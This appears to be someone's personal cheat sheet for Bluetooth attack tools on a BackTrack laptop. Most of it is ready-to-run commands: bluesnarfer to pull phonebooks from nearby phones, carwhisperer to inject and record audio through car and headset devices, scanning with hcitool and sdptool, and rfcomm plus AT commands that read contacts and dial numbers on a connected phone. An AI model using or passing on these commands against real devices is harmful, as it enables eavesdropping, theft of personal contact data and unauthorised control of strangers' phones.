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Bluetooth Notes

For Bluetooth on Asus EEE:

For Install:
install sox:  #sudo apt-get install sox
install bluetooth: #sudo apt-get install libbluetooth-dev
install festival
Install carwhisperer

#I moved to /usr/bin/ (original saved as
#I moved hcid.conf to /etc/bluetooth/hcid.conf (original saved as BACKUP_hcid.conf)

For Operation:
bt mnt # hciconfig hci0 up
bt mnt # hciconfig hci0 mode monitor
#btscanner (to scan for devices in area.  I didn't use this, but it comes with Backtrack)
#sdptool search HS ------this will look for handsets!!! 
#bluesnarfer (to pull info off of those devices, i.e. phonebook)
(for example#bluesnarfer -r 1-100 -C 4 - FF:FF:FF:FF:FF:FF)

#carwhisperer hci0 [channel] takes a recording
#carwhisperer hci0 test.raw out.raw mac
#./carwhisperer 0 eargasm.raw /tmp/out.raw 00:03:89:AA:5A:AC

#bluedrift_sniff (good scanner)

#hcitool info [mac] --- requests information from the device
#hcitool inq [ will inquire what is around]
#sdptool browse [mac] --- see what services are available

#sox -t raw -r 8000 -c 1 -s -w -t wav -r 44100 -c 2 out.wav --to change the raw to a wav file
#sox -t raw -r 8000 -c 1 -s -w message.raw -t ossdsp /dev/dsp ----to play message
#sox -t wav -r 44100 -c 2 -t raw -r 8000 -c 1 -s -w message.raw-----to make your own message (skip wav options if having proglems)
#sox -t wav -t raw -r 8000 -c 1 -s -w message.raw-----to make your own message

#echo "It's such a beautiful day! Why are you in front of the computer?" | text2wave -scale 50 -o beautiful_day.wav--------- to use festival to make your file
#echo "It's such a beautiful day! Why are you in front of the computer?" | text2wave -o beautiful_day.wav--------- to use festival to make your file

This just plays what you type:
#echo "It's such a beautiful day! Why are you in front of the computer?" | festival --tts
root@john-asus:/home/john# cd carwhisperer-0.2/
carwhisperer-0.2# clear

#rfcomm connect 0 mac channel---- to connect to a device.  If succcessful use at cmds:
          #at+gcap      --request complete capability list
          #at+gmi       --requests manufacturer
          #at+gmm       --requests model
          #at+gmr       --requests revision
          #at+cpbr=10   --pulls contact number 10 from phone
          #atd          --dial a phonenumber
          #ate          --echo

For BT notes for BackTrack3 CD, check out BT3Guide.txt


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